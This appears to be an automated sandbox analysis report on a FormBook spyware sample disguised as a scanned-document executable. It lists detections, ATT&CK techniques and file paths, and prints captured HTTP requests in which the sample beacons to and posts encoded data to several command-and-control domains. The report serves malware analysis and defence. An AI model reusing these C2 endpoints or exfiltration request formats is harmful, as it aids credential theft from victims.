### Loading ...

Play interactive tourEdit tour

# Analysis Report SKMBT 25032020 Ref- 0000019.exe

## Overview

### General Information

 Joe Sandbox Version: 28.0.0 Lapis Lazuli Analysis ID: 218312 Start date: 26.03.2020 Start time: 18:56:29 Joe Sandbox Product: CloudBasic Overall analysis duration: 0h 19m 14s Hypervisor based Inspection enabled: false Report type: full Sample file name: SKMBT 25032020 Ref- 0000019.exe Cookbook file name: default.jbs Analysis system description: Windows 10 64 bit (version 1803) with Office 2016, Adobe Reader DC 19, Chrome 70, Firefox 63, Java 8.171, Flash 30.0.0.113 Number of analysed new started processes analysed: 23 Number of new started drivers analysed: 0 Number of existing processes analysed: 0 Number of existing drivers analysed: 0 Number of injected processes analysed: 2 Technologies: HCA enabledEGA enabledHDC enabledAMSI enabled Analysis stop reason: Timeout Detection: MAL Classification: mal100.troj.spyw.evad.winEXE@25/21@41/7 EGA Information: Successful, ratio: 66.7% HDC Information: Successful, ratio: 50.3% (good quality ratio 47.3%)Quality average: 70.5%Quality standard deviation: 31% HCA Information: Successful, ratio: 100%Number of executed functions: 201Number of non-executed functions: 272 Cookbook Comments: Adjust boot timeEnable AMSIFound application associated with file extension: .exe Warnings: Show AllExclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, svchost.exeExcluded IPs from analysis (whitelisted): 92.122.156.202, 205.185.216.10, 205.185.216.42, 93.184.221.240, 2.20.143.16, 2.20.143.23Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, wu.ec.azureedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, a767.dscg3.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu.azureedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.netExecution Graph export aborted for target Cookies7n1p8js.exe, PID 5456 because it is emptyExecution Graph export aborted for target SKMBT 25032020 Ref- 0000019.exe, PID 4864 because it is emptyReport creation exceeded maximum time and may have missing disassembly code information.Report size exceeded maximum capacity and may have missing behavior information.Report size getting too big, too many NtDeviceIoControlFile calls found.Report size getting too big, too many NtOpenKeyEx calls found.Report size getting too big, too many NtProtectVirtualMemory calls found.Report size getting too big, too many NtQueryValueKey calls found.

### Detection

StrategyScoreRangeReportingWhitelistedThreatDetection
Threshold1000 - 100false
FormBook

### Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false

### Analysis Advice

 Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior
 Sample monitors window changes (e.g. starting applications), analyze the sample with the 'Simulates keyboard and window changes' cookbook
 Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

### Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsExecution through API1Registry Run Keys / Startup Folder1Process Injection712Software Packing23Credential Dumping1Security Software Discovery121Remote File Copy3Man in the Browser1Data Encrypted1Remote File Copy3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Replication Through Removable MediaExecution through Module Load1Port MonitorsAccessibility FeaturesDisabling Security Tools1Network SniffingFile and Directory Discovery3Remote ServicesData from Local System1Exfiltration Over Other Network MediumStandard Cryptographic Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
External Remote ServicesExploitation for Client Execution1Accessibility FeaturesPath InterceptionDeobfuscate/Decode Files or Information1Input CaptureSystem Information Discovery13Windows Remote ManagementEmail Collection1Automated ExfiltrationStandard Non-Application Layer Protocol4Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Drive-by CompromiseGraphical User Interface1System FirmwareDLL Search Order HijackingObfuscated Files or Information4Credentials in FilesVirtualization/Sandbox Evasion3Logon ScriptsInput CaptureData EncryptedStandard Application Layer Protocol14SIM Card SwapPremium SMS Toll Fraud
Exploit Public-Facing ApplicationCommand-Line InterfaceShortcut ModificationFile System Permissions WeaknessMasquerading1Account ManipulationProcess Discovery2Shared WebrootData StagedScheduled TransferStandard Cryptographic ProtocolManipulate Device CommunicationManipulate App Store Rankings or Ratings
Spearphishing LinkGraphical User InterfaceModify Existing ServiceNew ServiceVirtualization/Sandbox Evasion3Brute ForceApplication Window Discovery1Third-party SoftwareScreen CaptureData Transfer Size LimitsCommonly Used PortJamming or Denial of ServiceAbuse Accessibility Features
Spearphishing AttachmentScriptingPath InterceptionScheduled TaskProcess Injection712Two-Factor Authentication InterceptionRemote System Discovery1Pass the HashEmail CollectionExfiltration Over Command and Control ChannelUncommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

### Signature Overview

Click to jump to signature section

#### AV Detection:

 Multi AV Scanner detection for domain / URL Show sources
 Source: www.msdcong.com Virustotal: Detection: 7% Perma Link Source: http://www.msdcong.com/pg/ Virustotal: Detection: 7% Perma Link
 Multi AV Scanner detection for dropped file Show sources
 Source: C:\Users\user\AppData\Local\Temp\Uchul\Cookies7n1p8js.exe Virustotal: Detection: 24% Perma Link
 Multi AV Scanner detection for submitted file Show sources
 Source: SKMBT 25032020 Ref- 0000019.exe Virustotal: Detection: 24% Perma Link
 Yara detected FormBook Show sources
 Source: Yara match File source: 00000014.00000002.1332226146.0000000003FC5000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.830247657.0000000003FB1000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.926567870.0000000001530000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000014.00000002.1332524993.0000000004071000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1347747865.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1348571490.0000000000A50000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.926188004.00000000014F0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000002.1349070848.0000000000AC0000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000015.00000001.1327294732.0000000000400000.00000040.00020000.sdmp, type: MEMORY Source: Yara match File source: 00000005.00000002.923931879.0000000000400000.00000040.00000001.sdmp, type: MEMORY Source: Yara match File source: 00000004.00000002.829807297.0000000003F05000.00000004.00000001.sdmp, type: MEMORY Source: Yara match File source: 21.2.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 21.2.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 21.1.Cookies7n1p8js.exe.400000.0.unpack, type: UNPACKEDPE Source: Yara match File source: 21.1.Cookies7n1p8js.exe.400000.0.raw.unpack, type: UNPACKEDPE Source: Yara match File source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack, type: UNPACKEDPE
 Antivirus or Machine Learning detection for unpacked file Show sources
 Source: 21.2.Cookies7n1p8js.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 21.1.Cookies7n1p8js.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen Source: 4.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen Source: 20.2.Cookies7n1p8js.exe.400000.0.unpack Avira: Label: TR/Dropper.Gen Source: 5.2.SKMBT 25032020 Ref- 0000019.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen

#### Spreading:

 Enumerates the file system Show sources
 Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming

#### Software Vulnerabilities:

 Found inlined nop instructions (likely shell or obfuscated code) Show sources
 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4x nop then pop edi 5_2_00414068 Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4x nop then pop edi 5_2_0041511F Source: C:\Users\user\Desktop\SKMBT 25032020 Ref- 0000019.exe Code function: 4x nop then pop ebx 5_2_0040546C Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 4x nop then pop edi 21_2_00414068 Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 4x nop then pop edi 21_2_0041511F Source: C:\Program Files (x86)\Uchul\Cookies7n1p8js.exe Code function: 4x nop then pop ebx 21_2_0040546C

#### Networking:

 HTTP GET or POST without a user agent Show sources
 Source: global traffic HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=bp3gRoXoP4yEgK1sgJSYJfU+FssScB904rbINqXJ/OBc+k4pi0Qt4zKRKRSxUz2ykIhM&2drl7=sL04ivN0C HTTP/1.1Host: www.frengeen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=RA/4Irk5P4f6SUywnqVLcdKqFQC5UyywDrBVn7AQH3o0gkoTjo44CDVTLwAwj/6QVTo4&2drl7=sL04ivN0C HTTP/1.1Host: www.aalldxea.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=9HTETHSv3BkodYmkolV6gIdBk+nR/n7VQF8IV1eTi9ORfvNnIi0cIKnqFVKcp7KNM91B&2drl7=sL04ivN0C HTTP/1.1Host: www.msdcong.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=Iu7OK7c719yg5+rObwJSE42h0tf2fXC4Qmo10pi2UhOWitvONWxHvB/i0oS+D3HNIxcl&2drl7=sL04ivN0C HTTP/1.1Host: www.wshlzhx.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=5lvF9aNASzw0/ednaHrHq3bCrY2s26KKXO6afqfWx34cy2T8YgpekM9WcQWNtwYcYtQM&2drl7=sL04ivN0C HTTP/1.1Host: www.zcn4.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii: Source: global traffic HTTP traffic detected: GET /pg/?cl=e4vtZaDIaVjVbVsGLqeRzvTTrFG4L6g9xJG3vo9VJEHdPRYNiZrjWKGrMWwHCGmSe8hL&2drl7=sL04ivN0C HTTP/1.1Host: www.alwaysbucheon.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
 IP address seen in connection with other malware Show sources
 Source: Joe Sandbox View IP Address: 91.195.240.94 91.195.240.94
 Internet Provider seen in connection with other malware Show sources
 Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown Source: Joe Sandbox View ASN Name: unknown unknown
 Uses a known web browser user agent for HTTP communication Show sources
 Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 50 57 30 65 64 37 38 33 61 70 2d 6b 65 76 75 62 72 6f 67 52 39 4d 46 4b 51 35 6d 69 73 75 4d 5a 72 69 52 33 65 35 6d 28 51 77 49 6c 33 68 6f 77 30 4c 56 63 69 69 31 58 41 47 49 79 34 67 6e 75 45 4b 44 36 4c 4c 4e 6d 41 33 41 58 62 6c 45 4c 57 6c 45 75 61 7e 5f 79 31 4a 32 32 43 7e 33 4d 53 41 7a 41 38 50 47 36 41 36 41 72 54 56 49 33 68 6f 55 57 4b 6c 6c 51 6d 51 65 76 5a 4c 54 38 70 6b 35 4c 35 43 72 66 70 71 69 46 73 6b 58 35 64 58 47 6d 37 74 55 6a 42 66 58 61 31 6c 66 37 78 67 79 78 56 77 54 4c 71 50 75 5a 45 78 41 4e 31 48 39 55 75 36 51 53 5a 43 4e 5a 7a 52 62 6d 37 41 50 77 55 67 33 7e 71 6d 61 32 5a 6c 6c 42 72 55 63 38 44 71 77 4d 6f 39 59 6b 42 58 42 69 5a 63 61 55 37 59 55 28 63 53 39 55 77 69 4d 36 78 71 69 78 72 67 59 43 75 38 6f 59 5f 61 79 75 57 67 43 6e 67 36 2d 71 61 76 35 45 4b 54 44 62 5f 47 5a 59 48 42 47 58 73 71 33 78 6b 39 38 34 76 70 71 38 79 6a 6d 51 64 37 46 42 55 36 55 75 58 57 35 49 6f 39 33 65 6d 54 68 38 58 41 5f 65 7a 5a 69 4f 41 76 4e 43 51 35 41 30 47 31 36 76 69 4c 6f 55 6b 45 79 5a 5a 76 70 73 76 56 5a 34 56 76 42 4d 77 54 79 78 54 55 50 51 51 66 4b 71 41 52 30 76 48 73 30 7e 31 49 4f 31 51 73 64 49 36 4d 65 69 5f 47 79 45 6e 79 61 4b 41 29 2e 00 00 00 00 00 00 00 00 Data Ascii: cl=TL7aPPW0ed783ap-kevubrogR9MFKQ5misuMZriR3e5m(QwIl3how0LVcii1XAGIy4gnuEKD6LLNmA3AXblELWlEua~_y1J22C~3MSAzA8PG6A6ArTVI3hoUWKllQmQevZLT8pk5L5CrfpqiFskX5dXGm7tUjBfXa1lf7xgyxVwTLqPuZExAN1H9Uu6QSZCNZzRbm7APwUg3~qma2ZllBrUc8DqwMo9YkBXBiZcaU7YU(cS9UwiM6xqixrgYCu8oY_ayuWgCng6-qav5EKTDb_GZYHBGXsq3xk984vpq8yjmQd7FBU6UuXW5Io93emTh8XA_ezZiOAvNCQ5A0G16viLoUkEyZZvpsvVZ4VvBMwTyxTUPQQfKqAR0vHs0~1IO1QsdI6Mei_GyEnyaKA). Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.frengeen.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.frengeen.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frengeen.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 54 4c 37 61 50 4e 32 67 4e 4e 76 70 36 49 52 41 6c 70 50 50 57 61 67 69 54 74 59 52 57 51 42 79 39 76 37 42 5a 6f 4b 4b 73 50 4a 34 34 77 67 49 6a 78 56 76 72 6b 4c 4b 55 43 69 30 54 41 4b 65 78 6f 59 56 75 41 36 70 36 4c 7a 4f 76 69 76 46 58 4c 6c 70 4b 32 70 38 6e 36 36 30 79 32 38 57 6e 6b 6d 5a 4a 54 38 7a 45 4d 58 45 32 42 72 43 69 77 41 49 7e 79 63 56 55 4c 4e 73 51 51 59 32 6f 4c 33 31 78 38 45 37 61 65 7e 67 43 5a 61 4b 43 2d 45 6d 39 4e 79 4f 6a 34 51 51 75 43 4c 54 64 77 52 58 30 53 34 78 7a 68 63 5a 4f 6f 58 41 4a 6d 42 35 42 45 32 47 55 74 71 6d 4b 63 43 63 54 54 39 6c 6b 4b 38 78 7e 42 45 35 67 72 6e 61 6c 4b 64 55 44 72 45 7a 30 69 61 72 62 70 68 4e 6a 48 54 52 73 59 46 73 57 75 6f 75 6e 39 69 56 55 6a 4f 45 31 52 62 41 70 34 41 50 5a 4e 6c 6c 55 63 32 41 6a 57 67 70 68 67 36 36 6c 4b 50 46 52 5a 7e 42 61 75 33 56 5a 41 55 61 41 74 32 32 79 6e 59 44 38 4c 45 63 36 42 6a 63 46 36 65 73 58 56 4f 68 6d 41 7e 4a 56 59 39 51 65 67 75 76 38 58 42 41 65 79 5a 49 4d 31 48 4e 43 45 6c 54 79 68 68 32 70 69 4c 35 57 30 55 30 43 35 54 35 73 76 4e 5a 35 67 4c 72 65 6d 33 79 37 68 4d 4f 51 30 72 4b 72 51 52 30 7a 48 74 48 35 58 49 43 79 46 6f 6c 4c 70 42 34 6d 49 66 2d 41 33 33 4a 66 5a 4e 50 57 7a 38 2d 67 5f 6c 4b 4a 79 42 77 6b 45 4c 75 7e 64 76 4d 56 66 75 6d 30 73 31 79 49 6d 4a 71 30 45 6e 7a 70 4b 64 61 57 43 43 76 55 56 76 43 78 54 6d 7a 33 2d 75 34 7a 56 77 4b 59 50 55 4f 72 78 4e 49 48 41 45 77 72 30 33 68 6d 5f 77 64 38 6f 70 57 59 54 6e 2d 7a 56 43 47 51 65 6f 48 6c 6b 41 67 73 4f 69 6b 74 53 49 44 6c 54 39 46 70 6a 74 4c 43 57 34 51 79 6b 51 34 32 36 75 4a 45 64 71 7a 6c 43 62 48 63 33 49 55 64 74 75 4a 4a 35 79 44 6d 36 35 69 45 55 33 65 51 6e 52 72 52 78 54 33 79 67 72 66 59 73 51 69 53 4e 67 69 37 54 76 7a 4a 6e 4e 6a 77 6b 35 69 41 70 61 51 39 39 57 42 30 67 65 6a 6e 4b 65 4d 6f 39 63 4e 68 4c 63 42 37 69 41 77 48 62 31 42 30 66 59 45 76 5f 55 46 70 69 59 6a 79 75 6c 59 41 66 43 76 50 61 79 58 53 44 78 75 72 6a 52 75 59 6a 4a 6d 74 58 7a 62 5a 41 6f 44 32 66 37 52 38 61 49 58 33 77 74 67 6e 73 52 44 42 55 4d 58 69 6b 4e 2d 57 70 74 35 35 49 67 4f 64 4b 41 35 33 35 4e 6c 65 6b 47 49 56 33 78 37 56 4a 4e 4a 77 45 6f 35 76 79 41 4e 62 76 55 72 56 37 57 68 48 56 73 30 66 37 68 57 67 70 5a 5a 58 4c 49 7a 44 30 61 34 4b 76 48 53 51 71 7a 32 7a 44 78 6b 77 42 7a 68 35 44 55 77 56 55 38 6c 6d 39 35 4e 70 79 4c 68 78 6b 6e 71 73 68 6e 57 76 6b 69 45 46 42 64 50 59 74 49 58 5a 51 6b 79 51 36 63 78 7a 74 6f 77 76 78 65 51 48 36 4f 64 4f 77 4d 5f 32 4f 73 6a 7a 52 77 37 73 4c 58 37 64 4f 6d 76 47 79 70 34 36 42 72 55 54 4b 47 75 74 41 77 48 Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.aalldxea.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.aalldxea.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aalldxea.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 5a 69 7a 43 57 4d 63 78 4e 59 61 5a 46 58 69 78 6a 39 70 54 48 6f 75 71 53 78 53 76 5a 67 4b 4a 66 63 73 66 68 71 30 35 58 55 38 57 74 67 38 2d 71 62 4a 64 4f 33 56 54 57 33 39 48 73 61 7a 35 58 7a 70 44 7a 71 4a 73 45 34 47 34 4d 4e 34 78 4c 47 42 6d 77 43 31 50 47 33 64 62 69 50 38 37 50 51 4f 45 67 42 42 4a 57 39 64 2d 59 46 57 6d 6f 76 4f 30 6b 69 49 4d 6e 61 39 32 70 70 56 48 6b 4e 72 33 73 41 67 77 43 6e 6f 31 30 45 4e 5f 37 70 57 2d 69 42 6f 6c 47 76 47 67 4e 55 78 6d 62 75 41 6f 4c 33 30 45 6f 63 32 46 44 41 5a 52 79 37 4b 72 77 45 63 76 32 49 61 48 28 67 43 62 7a 72 4a 4c 6b 77 76 61 64 41 53 39 42 73 52 72 6d 38 5a 72 79 4e 52 6f 7a 54 38 5a 68 38 75 61 28 35 6f 68 7a 43 6b 4f 45 43 59 51 35 46 48 6b 6d 36 50 57 43 43 62 72 7e 64 39 41 69 73 52 68 47 41 6c 71 4f 77 48 33 48 77 6b 52 41 69 43 4d 51 4e 4e 4e 6f 69 69 57 77 2d 49 63 56 46 73 77 46 42 38 31 55 79 7a 38 5a 62 67 5f 61 51 6e 61 67 75 6e 4c 61 47 50 48 6b 6a 44 31 70 2d 36 6d 77 41 59 51 61 68 50 49 7a 4b 63 32 4c 42 51 49 6f 4f 52 6d 41 6c 45 48 53 34 64 62 79 6b 46 6c 30 57 41 4f 7e 4f 64 5f 75 43 38 6b 4d 6f 33 38 34 6f 56 4e 56 63 31 74 6c 51 57 64 6c 2d 7a 36 4d 62 39 4b 4c 62 41 51 4b 76 57 4c 34 49 46 56 4a 67 29 2e 00 00 00 00 00 00 00 00 Data Ascii: cl=ZizCWMcxNYaZFXixj9pTHouqSxSvZgKJfcsfhq05XU8Wtg8-qbJdO3VTW39Hsaz5XzpDzqJsE4G4MN4xLGBmwC1PG3dbiP87PQOEgBBJW9d-YFWmovO0kiIMna92ppVHkNr3sAgwCno10EN_7pW-iBolGvGgNUxmbuAoL30Eoc2FDAZRy7KrwEcv2IaH(gCbzrJLkwvadAS9BsRrm8ZryNRozT8Zh8ua(5ohzCkOECYQ5FHkm6PWCCbr~d9AisRhGAlqOwH3HwkRAiCMQNNNoiiWw-IcVFswFB81Uyz8Zbg_aQnagunLaGPHkjD1p-6mwAYQahPIzKc2LBQIoORmAlEHS4dbykFl0WAO~Od_uC8kMo384oVNVc1tlQWdl-z6Mb9KLbAQKvWL4IFVJg). Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.aalldxea.comConnection: closeContent-Length: 161308Cache-Control: no-cacheOrigin: http://www.aalldxea.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.aalldxea.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 5a 69 7a 43 57 4e 46 41 4c 2d 47 49 50 46 37 47 69 4b 49 44 66 72 75 6f 42 52 6d 7a 55 54 62 36 57 76 59 50 68 70 63 39 4f 48 30 69 6f 41 73 2d 73 64 39 61 47 33 56 53 51 33 39 41 6f 61 32 4f 49 7a 52 4c 7a 75 78 57 45 34 4f 5f 46 72 30 34 49 57 42 50 77 69 78 5a 45 33 4a 36 69 4e 34 53 65 7a 69 63 32 52 4e 4a 4a 39 46 34 54 48 75 48 68 4b 6d 37 6e 53 55 46 6c 61 56 6a 6f 65 6b 79 6a 65 57 59 6b 68 38 79 47 55 31 35 37 6b 39 62 33 65 71 78 73 78 38 6d 44 6f 4f 7a 49 7a 42 69 4c 37 30 61 45 54 6f 48 32 63 7e 44 54 54 41 73 30 50 53 53 31 55 4d 64 32 4c 36 78 32 32 69 4f 78 59 4e 54 6e 42 54 67 57 52 6e 37 4f 5f 35 6a 69 35 4d 62 7e 75 4a 48 38 32 34 34 79 38 43 44 79 62 42 6b 73 32 41 66 58 44 45 6d 7a 51 6a 59 67 72 62 65 4f 6a 4c 45 6d 75 63 57 74 76 70 35 42 43 70 59 52 41 48 4c 46 77 6b 56 4c 33 7e 6b 56 75 67 44 35 69 54 61 7a 39 5a 59 43 6c 41 4c 43 45 30 4c 4a 48 4f 4b 55 4b 59 6a 55 43 76 75 6d 36 66 41 4e 47 36 36 35 54 44 53 70 34 6e 71 77 41 59 63 61 6c 53 54 7a 2d 55 32 4b 54 59 62 34 39 4a 36 47 6c 45 67 51 49 4e 5a 35 7a 6b 39 30 57 59 4f 34 2d 4d 59 75 78 63 6b 62 4c 65 4f 37 4d 42 4e 55 4d 31 74 38 41 58 52 6b 4d 53 7a 4c 73 34 70 4d 72 42 71 4f 61 7a 6c 36 70 55 67 57 39 72 65 66 42 67 4c 59 54 44 6f 54 76 51 4a 37 55 4d 6d 6c 63 63 57 63 52 4b 73 69 51 43 75 53 63 30 42 43 61 6c 68 4e 73 61 59 51 31 73 54 32 2d 5a 4d 6f 7a 54 76 4b 7a 6c 67 4a 4d 56 6f 37 41 62 62 63 4c 37 65 57 6c 62 56 6a 42 32 46 55 64 6e 36 43 4e 56 4d 30 65 4b 6f 31 39 6e 39 78 4d 4d 65 51 58 73 35 61 31 4c 46 73 4b 4e 47 56 64 46 56 7e 79 33 52 39 79 63 50 42 76 39 75 7a 4f 58 32 41 35 36 44 6c 6e 4c 59 36 35 76 55 37 38 68 69 4e 6e 32 68 44 44 77 6e 54 77 37 79 4d 63 33 47 5a 69 57 49 46 5f 31 2d 59 6b 48 37 7e 44 74 58 32 30 41 77 37 48 43 63 35 6e 66 68 44 68 62 30 4e 4e 45 72 7a 5f 4a 47 38 64 6a 47 69 45 6c 51 33 34 4f 4d 37 59 4a 57 49 70 4b 46 57 49 49 36 4b 5a 32 34 4c 32 62 57 32 57 74 41 7e 31 68 66 49 67 67 53 43 41 6f 4e 47 74 50 4c 42 36 67 57 79 77 76 46 36 55 35 31 48 74 49 54 62 4d 47 71 54 78 50 50 4b 6e 61 44 30 6a 4f 45 66 46 4d 4a 46 74 28 36 76 67 56 52 7a 37 31 44 6a 4a 57 77 4f 76 61 70 57 6d 31 33 56 67 6d 4e 6c 46 47 49 7e 69 67 55 39 69 56 66 44 55 4c 4e 6f 69 30 39 64 69 6b 34 75 61 51 44 41 71 6c 48 74 77 52 5f 64 6e 59 32 33 5f 73 48 28 65 73 6c 72 73 68 35 6b 4f 54 6c 63 62 68 5f 57 79 73 48 76 30 73 4e 66 46 44 48 77 35 57 6b 28 50 4a 58 54 52 28 55 61 37 31 65 57 68 35 34 45 42 70 58 48 54 70 6d 50 51 4d 62 52 36 78 70 4d 34 66 7a 5a 53 32 2d 65 4a 6a 56 64 75 66 71 59 32 34 37 62 51 7a 66 71 43 30 5f 56 65 46 4d 67 58 6a 36 Source: global traffic HTTP traffic detected: POST /pg/ HTTP/1.1Host: www.msdcong.comConnection: closeContent-Length: 408Cache-Control: no-cacheOrigin: http://www.msdcong.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.msdcong.com/pg/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 63 6c 3d 31 6c 66 2d 4e 6a 6a 74 68 57 46 53 4e 59 32 5f 6b 52 38 57 38 65 6c 33 6a 4f 6e 65 78 6c 43 53 46 51 31 54 49 43 43 53 6d 64 69 49 57 66 68 6a 45 48 6f 4a 41 50 76 73 65 7a 6e 43 67 37 6d 47 52 63 41 62 6a 79 32 42 55 68 46 76 59 66 68 35 63 4c 70 65 71 6d 69 36 69 51 4d 37 50 72 6f 5f 51 44 4f 42 6f 48 6e 67 36 6d 44 34 55 44 7e 6b 38 38 49 55 52 47 52 34 69 4f 4e 78 67 55 36 38 68 52 38 6f 49 57 4e 2d 75 53 6b 66 62 6a 6c 6f 55 33 6f 68 52 39 4b 6e 45 58 6e 38 64 67 79 62 55 53 73 39 70 38 4a 6b 72 37 38 48 42 6d 6f 72 63 59 79 7a 4e 72 34 76 44 5f 69 79 7a 74 72 5a 5a 59 58 4d 57 4c 30 76 4a 2d 75 55 38 34 53 6c 76 4b 63 30 67 37 50 37 4d 4c 4e 73 44 35 34 7a 4f 66 43 67 59 5a 66 62 4b 70 5a 69 68 44 61 4f 32 48 6e 65 53 53 70 4a 52 61 64 58 6a 4a 28 43 73 71 79 62 52 46 58 53 43 51 43 4e 64 47 59 6e 67 36 78 63 4a 6d 56 79 4f 63 32 77 68 6b 66 51 49 31 4e 6e 73 6c 6b 6a 63 69 28 74 64 35 46 4c 34 62 4d 70 79 57 43 64 7a 4c 73 7a 57 65 49 2d 4a 54 6c 71 63 71 37 69 68 49 44 37 6a 54 77 35 77 71 6c 4d 6e 77 50 52 5a 61 79 49 67 45 6b 6c 4a 6f 61 79 43 7a 69 70 73 7a 6c 6c 37 5f 30 57 42 71 51 61 39 70 53 6a 4d 44 79 53 55 39 56 6d 44 67 4d 71 50 56 59 69 42 7a 54 74 55 39 61 45 66 67 29 2e 00 29 2e 00 00 00 00 00 Data Ascii: 